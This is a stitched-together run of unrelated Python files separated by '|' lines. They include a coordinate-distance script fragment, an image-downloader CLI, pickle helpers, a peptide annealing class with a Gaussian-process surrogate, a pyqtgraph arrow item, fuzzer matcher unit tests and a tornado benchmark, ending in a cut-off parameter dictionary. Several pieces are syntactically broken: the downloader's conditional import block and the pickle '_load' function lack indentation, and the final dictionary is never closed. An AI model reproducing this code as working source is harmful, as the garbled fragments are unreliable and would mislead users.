        referencia_aux = ponto_de_referencia.split()
        for i in range(0, 3):
            referencia_aux[i] = float(referencia_aux[i])
        referencia_convertida = referencia_aux
        break
    else:
        # Parse "x y z" into a list of three floats and store it.
        vetor_coordenada = coordenada.split()
        for i in range(0, 3):
            vetor_coordenada[i] = float(vetor_coordenada[i])
        lista_das_coordenadas.append(vetor_coordenada)
imprimir_coordenadas_iniciais(lista_das_coordenadas)
print("Soma das distâncias para o ponto "+ str(referencia_convertida) + ": ", soma_distancias(lista_das_coordenadas,referencia_convertida))
qtd_ciclos = int(input("Digite o número de ciclos: "))
diferencial_deslocamento = float(input("Digite o difirencial de deslocamento: "))
vetor_soma_distancias_deslocadas, lista_coordenadas_depois_dos_deslocamentos = deslocamento(lista_das_coordenadas, qtd_ciclos, diferencial_deslocamento, referencia_convertida)
imprimir_coordenadas_deslocadas(lista_das_coordenadas, lista_coordenadas_depois_dos_deslocamentos, qtd_ciclos, diferencial_deslocamento, referencia_convertida, vetor_soma_distancias_deslocadas)
|
'''
Function:
图片下载器
Author:
Charles
微信公众号:
Charles的皮卡丘
'''
import sys
import time
import click
if __name__ == '__main__':
from modules import *
from __init__ import __version__
else:
from .modules import *
from .__init__ import __version__
'''basic info'''
BASICINFO = '''************************************************************
Function: 图片下载器 V%s
Author: Charles
微信公众号: Charles的皮卡丘
操作帮助:
输入r: 重新初始化程序(即返回主菜单)
输入q: 退出程序
图片保存路径:
当前路径下的%s文件夹内
************************************************************'''
'''图片下载器'''
class imagedl():
    """Interactive image downloader driving one of the supported
    search-engine backends (bing / baidu / google)."""
    def __init__(self, configpath=None, config=None, **kwargs):
        # Either a path to a config file or an already-parsed config dict must
        # be supplied; an explicit dict takes precedence over the path.
        assert configpath or config, 'configpath or config should be given'
        self.config = loadconfig(configpath) if config is None else config
        # Maps source name -> downloader class from the modules package.
        self.supported_sources = {
            'bing': BingImageDownloader,
            'baidu': BaiduImageDownloader,
            'google': GoogleImageDownloader,
        }
    '''运行'''
    def run(self, target_src=None):
        """Main interactive loop: prompt for a keyword, then download
        matching images via the selected backend. Loops forever; 'q'
        (quit) and 'r' (restart) are intercepted by dealInput."""
        while True:
            print(BASICINFO % (__version__, self.config.get('savedir')))
            # Prompt for the search keyword.
            user_input = self.dealInput('请输入图片搜索的关键词: ')
            target_src = 'baidu' if target_src is None else target_src
            # Instantiate the selected backend.
            selected_api = self.supported_sources[target_src](
                auto_set_proxies=self.config.get('auto_set_proxies', True),
                auto_set_headers=self.config.get('auto_set_headers', True),
            )
            # Start downloading.
            selected_api.download(
                keyword=user_input,
                search_limits=self.config.get('search_limits', 1000),
                num_threadings=self.config.get('num_threadings', 5),
                savedir=self.config.get('savedir'),
            )
    '''处理用户输入'''
    def dealInput(self, tip=''):
        """Read one line of user input. 'q' exits the program, 'r'
        restarts the main loop (via recursion into run); anything else
        is returned unchanged."""
        user_input = input(tip)
        if user_input.lower() == 'q':
            self.logging('ByeBye')
            sys.exit()
        elif user_input.lower() == 'r':
            self.run()
        else:
            return user_input
    '''logging'''
    def logging(self, msg, tip='INFO'):
        """Print *msg* prefixed with a timestamp and severity tag."""
        print(f'[{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())} {tip}]: {msg}')
    '''str'''
    def __str__(self):
        return 'Welcome to use imagedl!\nYou can visit https://github.com/CharlesPikachu/imagedl for more details.'
'''cmd直接运行'''
@click.command()
@click.version_option()
@click.option('-k', '--keyword', default=None, help='想要搜索下载的图片关键字, 若不指定, 则进入imagedl终端版')
@click.option('-s', '--savedir', default='images', help='下载的图片的保存路径')
@click.option('-t', '--target', default='baidu', help='指定图片搜索下载的平台, 例如"baidu"')
@click.option('-l', '--limits', default=1000, help='下载的图片数量')
@click.option('-n', '--nthreadings', default=5, help='使用的线程数量')
def imagedlcmd(keyword, savedir, target, limits, nthreadings):
    """Command-line entry point: download directly when a keyword is given,
    otherwise fall back to the interactive imagedl session."""
    config = {
        'savedir': savedir,
        'auto_set_proxies': True,
        'auto_set_headers': True,
        'search_limits': limits,
        'num_threadings': nthreadings,
    }
    client = imagedl(config=config)
    if keyword is None:
        # No keyword on the command line: run the interactive terminal version.
        client.run(target_src=target)
        return
    print(client)
    backends = {
        'bing': BingImageDownloader,
        'baidu': BaiduImageDownloader,
        'google': GoogleImageDownloader,
    }
    downloader = backends[target](
        auto_set_proxies=config.get('auto_set_proxies', True),
        auto_set_headers=config.get('auto_set_headers', True),
    )
    downloader.download(
        keyword=keyword,
        search_limits=config.get('search_limits', 1000),
        num_threadings=config.get('num_threadings', 5),
        savedir=config.get('savedir'),
    )
'''run'''
# Script entry point: load settings from 'config.json' and start the
# interactive downloader.
if __name__ == '__main__':
    dl_client = imagedl('config.json')
    dl_client.run()
import pickle
#Finds the variable associated with a variable name
def get_obj(globals, locals, arg):
    """Look up the object bound to the name *arg*, checking *locals* first
    and falling back to *globals*.

    Both namespaces are plain dicts (e.g. the results of the builtins
    globals()/locals()). Raises ValueError if the name is bound in neither.
    """
    # Narrow exception handling: the original used bare 'except:' clauses,
    # which also swallowed unrelated errors such as KeyboardInterrupt.
    try:
        return locals[arg]
    except KeyError:
        pass
    try:
        return globals[arg]
    except KeyError:
        print('Invalid variable name entered:', arg)
        # Name the offending variable in the exception; suppress the
        # uninteresting KeyError context.
        raise ValueError(arg) from None
#Pickles objects
def save(globals, locals, filename, *args):
    """Pickle the named variables into *filename* as a {name: object} dict.

    *args* are variable-name strings, resolved against the given namespace
    dicts via get_obj. Raises ValueError (from get_obj) for unknown names.
    """
    objs_dict = {arg: get_obj(globals, locals, arg) for arg in args}
    # 'with' guarantees the file handle is closed even if pickling fails;
    # the original leaked the handle on error.
    with open(filename, 'wb') as fh:
        pickle.dump(objs_dict, fh)
#Loads objects from file and unpickles them
def _load(filename, *args):
file = open(filename, 'rb')
objs = pickle.load(file)
file.close()
get_obj = lambda arg: objs[arg]
objs_tuple = tuple(map(get_obj, args))
return objs_tuple
#Loads objects directly into locals
def implicit_load(locals, filename, *args):
    """Unpickle the named objects from *filename* and bind each one into
    the *locals* namespace dict under its saved name."""
    objs_tuple = _load(filename, *args)
    # Pair names with objects directly; clearer than indexing by range(len()).
    for name, obj in zip(args, objs_tuple):
        locals[name] = obj
#Returns an object or tuple of unpickled object
def explicit_load(filename, *args):
    """Return the unpickled object for a single requested name, or a
    tuple of objects when several names are requested."""
    loaded = _load(filename, *args)
    if len(loaded) > 1:
        return loaded
    return loaded[0]
|
import sys
import numpy as np
import matplotlib.pyplot as plt
from scipy.io import savemat
import pickle
from modlamp.sequences import Random
from modlamp.descriptors import PeptideDescriptor, GlobalDescriptor
from modlamp.core import load_scale
from sklearn.preprocessing import StandardScaler
import physbo
import threading
import copy
class ParallelThread(threading.Thread):
    """Thread wrapper that runs func(*args) and keeps the return value.

    BUG FIX: the original called the function inside __init__, which
    executed the work synchronously in the constructor — start()/join()
    were no-ops and the "threads" never ran concurrently. The call now
    happens in run(), so it executes on the worker thread after start().
    """
    def __init__(self, func, args, name=''):
        threading.Thread.__init__(self)
        self.name = name
        self.func = func
        self.args = args
        # Populated by run(); None until the thread has executed.
        self.result = None
    def run(self):
        # Executed on the worker thread when start() is called.
        self.result = self.func(*self.args)
    def get_result(self):
        """Return the function's result (call after join()); None if the
        thread has not run yet."""
        try:
            return self.result
        except Exception:
            return None
class SelfLearningEPA():
    """Self-learning population annealing over peptide sequences.

    Uses a Gaussian-process surrogate (physbo) trained on modlamp
    descriptor moments to cheapen the MCMC energy evaluations; true
    energies are only computed once per annealing iteration.
    """
    def __init__(self, plen, num_particle, MC_step=1, numiter=20, seed=1):
        # The 20 standard amino-acid one-letter codes.
        self.am = ['A','C','D','E','F','G','H','I','K','L','M','N','P','Q','R','S','T','V','W','Y']
        # Counts how many sequences have been evaluated with the true objective.
        self.num_exp = 0
        self.num_particle = num_particle
        np.random.seed(seed)
        self.plen = plen
        self.numiter = numiter
        # Inverse-temperature annealing schedule from 0 to 10.
        self.betas = np.linspace(0,10,numiter)
        # Number of energy-histogram bins used by the reweighting code.
        self.num_discretize = 50
        self.es = np.zeros(self.num_discretize)
        self.scaler = StandardScaler()
        # fake MC_step
        self.MC_step = MC_step
        # Initial state
        self.lib = Random(num_particle,lenmin=plen,lenmax=plen)
        self.lib.generate_sequences(proba='rand')
        # Descriptor
        self.tscale = load_scale('t_scale')[1]
        self.X_train = []
        self.X_train_scaled = []
        self.t_train = []
        # Per-iteration records of true energies and sequences.
        self.allenergy = np.zeros([self.numiter, self.num_particle])
        self.allseq = [['']*self.num_particle for i in range(self.numiter)]
        self.E_max = 0
        self.E_min = 0
    def self_learning_population_annealing(self):
        """Run the annealing loop: resample, run surrogate-driven MCMC per
        particle (in ParallelThread workers), evaluate true energies, then
        retrain the GP surrogate on the accumulated data.

        Returns (sequences per iteration, true energies per iteration),
        both copied before the final reweighting resample.
        """
        # initial random state
        x_current = np.array(self.lib.sequences)
        E_current = self.calculating_value(list(x_current))
        allenergy_surr = np.zeros([self.numiter, self.num_particle])
        for biter in range(self.numiter):
            print("iteration =",biter)
            print("mean value of E =",np.mean(E_current),"+/-",np.std(E_current))
            print("number of training data =",len(self.t_train))
            # On the first iteration there is no surrogate yet, so skip
            # resampling and MCMC; 'gp' is defined from iteration 0's tail.
            if biter != 0:
                # resampling
                x_current, E_current_surr = self.resampling(self.betas[biter], self.betas[biter-1], E_current_surr, E_current_surr_prev, x_current)
                # MCMC
                threads = []
                for i in range(self.num_particle):
                    t = ParallelThread(self.MCMC, (x_current[i], E_current_surr[i], biter, gp), self.MCMC.__name__)
                    threads.append(t)
                for i in range(self.num_particle):
                    threads[i].start()
                for i in range(self.num_particle):
                    threads[i].join()
                for i in range(self.num_particle):
                    x_current[i], E_current_surr[i] = threads[i].get_result()
                E_current = self.calculating_value(list(x_current))
                E_current_surr_prev = copy.deepcopy(E_current_surr)
            # add training data
            for i in range(len(x_current)):
                x_desc = self.trans_descriptor(x_current[i])
                self.X_train.append(x_desc)
                self.t_train.append(E_current[i])
            self.X_train_scaled = self.scaler.fit_transform(self.X_train)
            # surrogate model
            gp = self.train_model()
            # surrogate E
            X_test = []
            for i in range(len(x_current)):
                x_desc = self.trans_descriptor(x_current[i])
                X_test.append(x_desc)
            X_test_scaled = self.scaler.transform(X_test)
            E_current_surr = gp.get_post_fmean(np.array(self.X_train_scaled), np.array(X_test_scaled))
            if biter == 0: E_current_surr_prev = copy.deepcopy(E_current_surr)
            self.allenergy[biter] = E_current
            self.allseq[biter] = x_current
            allenergy_surr[biter] = E_current_surr_prev
        allseq_all = copy.deepcopy(self.allseq)
        allenergy_all = copy.deepcopy(self.allenergy)
        # Final pass: reweight each iteration's population from surrogate to
        # true energies at the same beta.
        for biter in range(len(self.allenergy)):
            self.allseq[biter], self.allenergy[biter] = self.resampling(self.betas[biter], self.betas[biter], self.allenergy[biter], allenergy_surr[biter], self.allseq[biter])
        return allseq_all, allenergy_all
    def collect_observable(self, thresarray, f, sequences, energy):
        """Accumulate multi-histogram-reweighted per-position amino-acid
        frequencies over sequences whose energy is below each threshold in
        *thresarray*; also prints summary statistics per threshold.

        f: per-iteration free energies from multi_histogram().
        Returns the (len(thresarray), plen, 20) normalized counter array.
        """
        # R[i][j]: normalized reweighting factor of energy bin i at beta j.
        R = np.zeros([self.num_discretize,self.numiter])
        for i in range(self.num_discretize):
            for j in range(self.numiter):
                R[i][j] = np.exp(-self.betas[j]*self.es[i] + f[j])
            R[i] = R[i]/np.sum(R[i])
        counter = np.zeros((len(thresarray), self.plen, len(self.am)))
        for thresid in range(len(thresarray)):
            thres = thresarray[thresid]
            # observable
            for biter in range(self.numiter):
                matches= [self.allseq[biter][i] for i,x in enumerate(self.allenergy[biter]) if x <= thres]
                matchenergy = [self.allenergy[biter][i] for i,x in enumerate(self.allenergy[biter]) if x <= thres]
                for ip in range(self.plen):
                    for j in range(len(self.am)):
                        mm = [matchenergy[i] for i,x in enumerate(matches) if x[ip] == self.am[j]]
                        for k in mm:
                            # Bin index of this energy in [E_min, E_max).
                            ik = int((k-self.E_min)/(self.E_max-self.E_min)*self.num_discretize)
                            counter[thresid][ip][j] += R[ik][biter]*np.exp(self.betas[biter]*self.es[ik]-f[biter])
                        #counter[ip][j] += 1
            # Deduplicate sequences to count unique samples/hits.
            edict = {}
            for i in range(self.numiter):
                for j in range(self.num_particle):
                    edict[sequences[i][j]] = energy[i][j]
            c = 0
            for i in edict:
                if (edict[i] <= thres):
                    c +=1
            print("********************")
            print("thres =", thres)
            print("number of experiments =", self.num_exp)
            print("UNIQsample =", len(edict))
            print("UNIQseq =",c)
            print("MIN =",np.min(energy))
            if (np.sum(counter[thresid]) > 0):
                counter[thresid] /= np.sum(counter[thresid])
        return counter
    def resampling(self, beta_current, beta_prev, E_current, E_current_prev, seq_current):
        """Multinomially resample the population with importance weights
        exp(-beta_current*E_current + beta_prev*E_current_prev)."""
        prob = np.exp(-beta_current*E_current + beta_prev*E_current_prev)
        prob = prob/np.sum(prob)
        ids = np.random.choice(self.num_particle,self.num_particle, p=prob, replace=True)
        seq_current = np.array(seq_current)[ids]
        E_current = np.array(E_current)[ids]
        return seq_current, E_current
    def MCMC(self, x_curr, e_curr, biter, gp):
        """Metropolis updates of one sequence using the GP surrogate energy;
        returns the final (sequence, surrogate energy)."""
        for _ in range(self.MC_step):
            x_proposal = self.mutation(x_curr)
            X_test_scaled = self.scaler.transform([self.trans_descriptor(x_proposal)])
            E_proposal = gp.get_post_fmean(np.array(self.X_train_scaled), np.array(X_test_scaled))[0]
            # Metropolis acceptance at inverse temperature betas[biter].
            if np.exp(self.betas[biter]*(e_curr - E_proposal)) > np.random.rand():
                x_curr = x_proposal
                e_curr = E_proposal
        return x_curr, e_curr
    def mutation(self, x):
        """Return a copy of sequence *x* with one random position replaced
        by a random amino acid."""
        x = list(x)
        select_dimension = np.random.randint(0, self.plen)
        x[select_dimension] = np.random.choice(self.am)
        return ''.join(x)
    def make_histogram(self):
        """Histogram the recorded true energies per iteration into
        num_discretize bins over [E_min, E_max]; sets E_min/E_max."""
        # Small offsets keep every energy strictly inside the binning range.
        self.E_max = np.max(self.allenergy)+0.000001
        self.E_min = np.min(self.allenergy)-0.000001
        estdists = np.zeros([self.numiter,self.num_discretize])
        for biter in range(self.numiter):
            for e in self.allenergy[biter]:
                index_current = int((e-self.E_min)/(self.E_max-self.E_min)*self.num_discretize)
                estdists[biter][index_current] += 1
        return estdists
    def multi_histogram(self):
        """WHAM-style multiple-histogram reweighting: iteratively estimate
        the density of states and the per-beta free energies.

        Returns (normalized density of states, free energies f)."""
        estdists = self.make_histogram()
        estsum = np.sum(estdists,axis = 0)
        width = self.E_max-self.E_min
        # Bin centers.
        for i in range(self.num_discretize):
            low = self.E_min + i*width/self.num_discretize
            high = self.E_min + (i+1)*width/self.num_discretize
            self.es[i] = (high+low)/2
        f = np.zeros(self.numiter)
        # Fixed-point iteration (10 sweeps) for the WHAM equations.
        for fiter in range(10):
            estn = np.zeros(self.num_discretize)
            for i in range(self.num_discretize):
                res = 0
                for j in range(self.numiter):
                    res = res + sum(estdists[j,:])*np.exp(-self.betas[j]*self.es[i]+f[j])
                estn[i] = estsum[i]/res
            for j in range(self.numiter):
                f[j] = -np.log(np.dot(estn, np.exp(-self.betas[j]*self.es)))
        estn = estn/np.sum(estn)
        return estn, f
    def trans_descriptor(self, x):
        """Concatenate the per-residue t-scale descriptor values of
        sequence *x* into one flat feature list."""
        desc = []
        for i in range(self.plen):
            desc += self.tscale[x[i]]
        return desc
    def train_model(self):
        """Fit and return a physbo Gaussian-process regressor on the
        scaled training descriptors and true energies."""
        cov = physbo.gp.cov.gauss(np.array(self.X_train_scaled).shape[1], ard = False)
        mean = physbo.gp.mean.const()
        lik = physbo.gp.lik.gauss()
        gp = physbo.gp.model(lik=lik,mean=mean,cov=cov)
        config = physbo.misc.set_config()
        gp.fit(np.array(self.X_train_scaled), np.array(self.t_train), config)
        gp.prepare(np.array(self.X_train_scaled), np.array(self.t_train))
        return gp
    def calculating_value(self, population, function='moment_tm'):
        """Evaluate the true objective (negated modlamp descriptor moment)
        for every sequence in *population*; increments self.num_exp."""
        score = []
        if not isinstance(population,list):
            population = [population]
        if function == 'moment_eisenberg':
            desc = PeptideDescriptor(population,'eisenberg')
            desc.calculate_moment()
            score = desc.descriptor
        elif function == 'moment_tm':
            desc = PeptideDescriptor(population,'TM_tend')
            desc.calculate_moment()
            score = desc.descriptor
        # NOTE(review): 'global num_exp' is a leftover no-op — the counter
        # actually used is the instance attribute self.num_exp below.
        global num_exp
        self.num_exp += len(population)
        # Negate: the annealer minimizes energy, the moment is maximized.
        score = -score
        return [*score.flat]
def hellinger(p,q):
    """Hellinger distance between two discrete distributions *p* and *q*."""
    diff = np.sqrt(p) - np.sqrt(q)
    return np.linalg.norm(diff) / np.sqrt(2)
|
# Licensed under the MIT License
# https://github.com/craigahobbs/unittest-parallel/blob/main/LICENSE
|
# Description: Print five rows of the Iobs for a specified Miller array.
# Source: NA
"""
list(Iobs[${1:100:105}])
"""
# Expanded form of the snippet template above: items 100-104 of Iobs.
list(Iobs[100:105])
|
import numpy as np
from AnyQt.QtWidgets import QGraphicsLineItem
from AnyQt.QtCore import QRectF, QLineF
from AnyQt.QtGui import QTransform
import pyqtgraph as pg
class TextItem(pg.TextItem):
    """pg.TextItem with `setAnchor` backported for old pyqtgraph versions."""
    if not hasattr(pg.TextItem, "setAnchor"):
        # Compatibility with pyqtgraph <= 0.9.10; in (as of yet unreleased)
        # 0.9.11 the TextItem has a `setAnchor`, but not `updateText`
        def setAnchor(self, anchor):
            # Store the new anchor point and re-render the text.
            self.anchor = pg.Point(anchor)
            self.updateText()
class AnchorItem(pg.GraphicsObject):
    """A line ("spine") with an arrow head and a text label, used as an
    axis/anchor indicator inside a pyqtgraph scene.

    The item itself paints nothing (ItemHasNoContents); the spine, arrow
    and label are child items positioned in __updateLayout.
    """
    def __init__(self, parent=None, line=QLineF(), text="", **kwargs):
        super().__init__(parent, **kwargs)
        self._text = text
        self.setFlag(pg.GraphicsObject.ItemHasNoContents)
        self._spine = QGraphicsLineItem(line, self)
        angle = line.angle()
        self._arrow = pg.ArrowItem(parent=self, angle=0)
        self._arrow.setPos(self._spine.line().p2())
        self._arrow.setRotation(angle)
        self._arrow.setStyle(headLen=10)
        self._label = TextItem(text=text, color=(10, 10, 10))
        self._label.setParentItem(self)
        self._label.setPos(self._spine.line().p2())
        if parent is not None:
            self.setParentItem(parent)
    def setText(self, text):
        """Set the label text; an empty string hides the label."""
        if text != self._text:
            self._text = text
            self._label.setText(text)
            self._label.setVisible(bool(text))
    def text(self):
        """Return the current label text."""
        return self._text
    def setLine(self, *line):
        """Set the spine line (accepts a QLineF or its constructor args)."""
        line = QLineF(*line)
        if line != self._spine.line():
            self._spine.setLine(line)
            self.__updateLayout()
    def line(self):
        """Return the spine's QLineF."""
        return self._spine.line()
    def setPen(self, pen):
        """Set the pen used to draw the spine."""
        self._spine.setPen(pen)
    def setArrowVisible(self, visible):
        """Show or hide the arrow head."""
        self._arrow.setVisible(visible)
    def paint(self, painter, option, widget):
        # Nothing to paint here; see the ItemHasNoContents flag in __init__.
        pass
    def boundingRect(self):
        return QRectF()
    def viewTransformChanged(self):
        # Keep label/arrow placement consistent when the view transform changes.
        self.__updateLayout()
    def __updateLayout(self):
        """Re-anchor and re-rotate the label and arrow based on the spine's
        angle in scene coordinates."""
        T = self.sceneTransform()
        if T is None:
            T = QTransform()
        # map the axis spine to scene coord. system.
        viewbox_line = T.map(self._spine.line())
        angle = viewbox_line.angle()
        assert not np.isnan(angle)
        # note in Qt the y axis is inverted (90 degree angle 'points' down)
        left_quad = 270 < angle <= 360 or -0.0 <= angle < 90
        # position the text label along the viewbox_line
        label_pos = self._spine.line().pointAt(0.90)
        if left_quad:
            # Anchor the text under the axis spine
            anchor = (0.5, -0.1)
        else:
            # Anchor the text over the axis spine
            anchor = (0.5, 1.1)
        self._label.setPos(label_pos)
        self._label.setAnchor(pg.Point(*anchor))
        self._label.setRotation(-angle if left_quad else 180 - angle)
        self._arrow.setPos(self._spine.line().p2())
        self._arrow.setRotation(180 - angle)
|
import unittest
import operator
from src.fuzzingtool.core.matcher import Matcher
from src.fuzzingtool.objects.result import Result
from src.fuzzingtool.exceptions.main_exceptions import BadArgumentType
from ..mock_utils.response_mock import ResponseMock
class TestMatcher(unittest.TestCase):
    """Unit tests for fuzzingtool's Matcher.

    Private (name-mangled) methods are reached via their mangled names,
    e.g. Matcher._Matcher__build_allowed_status; for the methods that do
    not touch instance state, the class itself is passed in place of self.
    """
    def test_build_allowed_status_without_status(self):
        # No status argument defaults to allowing only HTTP 200.
        return_expected = {
            'is_default': True,
            'list': [200],
            'range': []
        }
        returned_allowed_status_dict = Matcher._Matcher__build_allowed_status(Matcher, None)
        self.assertIsInstance(returned_allowed_status_dict, dict)
        self.assertDictEqual(returned_allowed_status_dict, return_expected)
    def test_build_allowed_status_with_list_and_range(self):
        return_expected = {
            'is_default': False,
            'list': [401, 403],
            'range': [200, 399]
        }
        returned_allowed_status_dict = Matcher._Matcher__build_allowed_status(Matcher, "200-399,401,403")
        self.assertIsInstance(returned_allowed_status_dict, dict)
        self.assertDictEqual(returned_allowed_status_dict, return_expected)
    def test_build_allowed_status_with_inverted_range(self):
        # A reversed range ("399-200") must be normalized to ascending order.
        return_expected = {
            'is_default': False,
            'list': [],
            'range': [200, 399]
        }
        returned_allowed_status_dict = Matcher._Matcher__build_allowed_status(Matcher, "399-200")
        self.assertIsInstance(returned_allowed_status_dict, dict)
        self.assertDictEqual(returned_allowed_status_dict, return_expected)
    def test_build_allowed_status_with_invalid_status_type(self):
        test_status = "200-399a"
        with self.assertRaises(BadArgumentType) as e:
            Matcher._Matcher__build_allowed_status(Matcher, test_status)
        self.assertEqual(str(e.exception), f"The match status argument ({test_status}) must be integer")
    def test_get_comparator_and_callback_with_operator_ge(self):
        return_expected = ('25', operator.ge)
        returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '>=25')
        self.assertIsInstance(returned_data, tuple)
        self.assertTupleEqual(returned_data, return_expected)
    def test_get_comparator_and_callback_with_operator_le(self):
        return_expected = ('25', operator.le)
        returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '<=25')
        self.assertIsInstance(returned_data, tuple)
        self.assertTupleEqual(returned_data, return_expected)
    def test_get_comparator_and_callback_with_operator_gt(self):
        return_expected = ('25', operator.gt)
        returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '>25')
        self.assertIsInstance(returned_data, tuple)
        self.assertTupleEqual(returned_data, return_expected)
    def test_get_comparator_and_callback_with_operator_lt(self):
        return_expected = ('25', operator.lt)
        returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '<25')
        self.assertIsInstance(returned_data, tuple)
        self.assertTupleEqual(returned_data, return_expected)
    def test_get_comparator_and_callback_with_operator_eq(self):
        return_expected = ('25', operator.eq)
        returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '==25')
        self.assertIsInstance(returned_data, tuple)
        self.assertTupleEqual(returned_data, return_expected)
    def test_get_comparator_and_callback_with_operator_ne(self):
        return_expected = ('25', operator.ne)
        returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '!=25')
        self.assertIsInstance(returned_data, tuple)
        self.assertTupleEqual(returned_data, return_expected)
    def test_get_comparator_and_callback_without_operator(self):
        # A bare number defaults to the "greater than" comparison.
        return_expected = ('25', operator.gt)
        returned_data = Matcher._Matcher__get_comparator_and_callback(Matcher, '25')
        self.assertIsInstance(returned_data, tuple)
        self.assertTupleEqual(returned_data, return_expected)
    def test_instance_comparator(self):
        return_expected = (25, operator.gt)
        returned_data = Matcher()._Matcher__instance_comparator(int, None, '25')
        self.assertIsInstance(returned_data, tuple)
        self.assertTupleEqual(returned_data, return_expected)
    def test_instance_comparator_with_invalid_integer(self):
        test_name = "test_name"
        test_value = "25test"
        with self.assertRaises(BadArgumentType) as e:
            Matcher()._Matcher__instance_comparator(int, test_name, test_value)
        self.assertEqual(str(e.exception), f"The {test_name} comparator must be an integer, not '{test_value}'!")
    def test_instance_comparator_with_invalid_number(self):
        test_name = "test_name"
        test_value = "25test"
        with self.assertRaises(BadArgumentType) as e:
            Matcher()._Matcher__instance_comparator(float, test_name, test_value)
        self.assertEqual(str(e.exception), f"The {test_name} comparator must be a number, not '{test_value}'!")
    def test_build_comparator(self):
        # Operators are stripped; only the numeric thresholds are stored.
        return_expected = {
            'time': 15,
            'size': 1500,
            'words': 50,
            'lines': 100,
        }
        returned_comparator = Matcher(
            time="15",
            size=">1500",
            words="!=50",
            lines="<100"
        )._Matcher__build_comparator(
            time="15",
            size=">1500",
            words="!=50",
            lines="<100"
        )
        self.assertIsInstance(returned_comparator, dict)
        self.assertDictEqual(returned_comparator, return_expected)
    def test_comparator_is_set_with_set(self):
        return_expected = True
        returned_data = Matcher(size='55').comparator_is_set()
        self.assertIsInstance(returned_data, bool)
        self.assertEqual(returned_data, return_expected)
    def test_comparator_is_set_without_set(self):
        return_expected = False
        returned_data = Matcher().comparator_is_set()
        self.assertIsInstance(returned_data, bool)
        self.assertEqual(returned_data, return_expected)
    def test_match_status_with_match(self):
        # ResponseMock's status (200) is in the allowed list.
        return_expected = True
        test_result = Result(response=ResponseMock())
        returned_match_flag = Matcher(
            allowed_status="200",
        ).match(test_result)
        self.assertIsInstance(returned_match_flag, bool)
        self.assertEqual(returned_match_flag, return_expected)
    def test_match_status_without_match(self):
        return_expected = False
        test_result = Result(response=ResponseMock())
        returned_match_flag = Matcher(
            allowed_status="401",
        ).match(test_result)
        self.assertIsInstance(returned_match_flag, bool)
        self.assertEqual(returned_match_flag, return_expected)
    def test_match_time(self):
        return_expected = True
        test_result = Result(response=ResponseMock(), rtt=3.0)
        returned_match_flag = Matcher(
            allowed_status="200",
            time="<=4"
        ).match(test_result)
        self.assertIsInstance(returned_match_flag, bool)
        self.assertEqual(returned_match_flag, return_expected)
    def test_match_size(self):
        return_expected = True
        test_result = Result(response=ResponseMock())
        returned_match_flag = Matcher(
            allowed_status="200",
            size=">=10",
        ).match(test_result)
        self.assertIsInstance(returned_match_flag, bool)
        self.assertEqual(returned_match_flag, return_expected)
    def test_match_words(self):
        return_expected = False
        test_result = Result(response=ResponseMock(), rtt=3.0)
        returned_match_flag = Matcher(
            allowed_status="200",
            words="<=4"
        ).match(test_result)
        self.assertIsInstance(returned_match_flag, bool)
        self.assertEqual(returned_match_flag, return_expected)
    def test_match_lines(self):
        return_expected = True
        test_result = Result(response=ResponseMock(), rtt=3.0)
        returned_match_flag = Matcher(
            allowed_status="200",
            lines="==2"
        ).match(test_result)
        self.assertIsInstance(returned_match_flag, bool)
        self.assertEqual(returned_match_flag, return_expected)
|
#!/usr/bin/env python
"""Benchmark for stack_context functionality."""
import collections
import contextlib
import functools
import subprocess
import sys
from tornado import stack_context
class Benchmark(object):
    """Common benchmark driver; subclasses provide make_context()."""
    def enter_exit(self, count):
        """Measures the overhead of the nested "with" statements
        when using many contexts.
        """
        if count < 0:
            return
        with self.make_context():
            self.enter_exit(count - 1)
    def call_wrapped(self, count):
        """Wraps and calls a function at each level of stack depth
        to measure the overhead of the wrapped function.
        """
        # Stands in for IOLoop.add_callback so that stack_context can be
        # benchmarked in isolation, without system-call overhead.
        pending = collections.deque()
        self.call_wrapped_inner(pending, count)
        while pending:
            callback = pending.popleft()
            callback()
    def call_wrapped_inner(self, queue, count):
        if count < 0:
            return
        with self.make_context():
            wrapped = stack_context.wrap(
                functools.partial(self.call_wrapped_inner, queue, count - 1))
            queue.append(wrapped)
class StackBenchmark(Benchmark):
    """Benchmarks tornado's StackContext with a trivial context manager."""
    def make_context(self):
        return stack_context.StackContext(self.__context)
    @contextlib.contextmanager
    def __context(self):
        # Do-nothing context: measures pure StackContext overhead.
        yield
class ExceptionBenchmark(Benchmark):
    """Benchmarks tornado's ExceptionStackContext with a no-op handler."""
    def make_context(self):
        return stack_context.ExceptionStackContext(self.__handle_exception)
    def __handle_exception(self, typ, value, tb):
        # Swallow everything: measures pure ExceptionStackContext overhead.
        pass
def main():
    """Run each benchmark statement under `python -m timeit` in a fresh
    subprocess so the measurements do not interfere with each other."""
    base_cmd = [
        sys.executable, '-m', 'timeit', '-s',
        'from stack_context_benchmark import StackBenchmark, ExceptionBenchmark']
    # Each statement exercises one benchmark class at two nesting depths.
    cmds = [
        'StackBenchmark().enter_exit(50)',
        'StackBenchmark().call_wrapped(50)',
        'StackBenchmark().enter_exit(500)',
        'StackBenchmark().call_wrapped(500)',
        'ExceptionBenchmark().enter_exit(50)',
        'ExceptionBenchmark().call_wrapped(50)',
        'ExceptionBenchmark().enter_exit(500)',
        'ExceptionBenchmark().call_wrapped(500)',
    ]
    for cmd in cmds:
        print(cmd)
        subprocess.check_call(base_cmd + [cmd])
if __name__ == '__main__':
    main()
|
# NDA (National Diabetes Audit) publication parameters: reporting-period
# settings plus the database/table locations of each source extract for the
# 2020/21 E3 publication.
params ={
    'publication_year':'202021',
    'publication_version':'E3',
    'publication_start_date':'2020-01-01',
    'publication_end_date':'2020-12-31',
    'newly_diagnosed_year': '2019',
    'nda_demo_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_DEMO_E3_202021'},
    'nda_bmi_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_BMI_E3_202021'},
    'nda_bp_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_BP_E3_202021'},
    'nda_chol_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_CHOL_E3_202021'},
    'nda_hba1c_table': {'database':'NDA_DPP_DMS', 'table':'lve.NDA_HBA1C_E3_202021'},
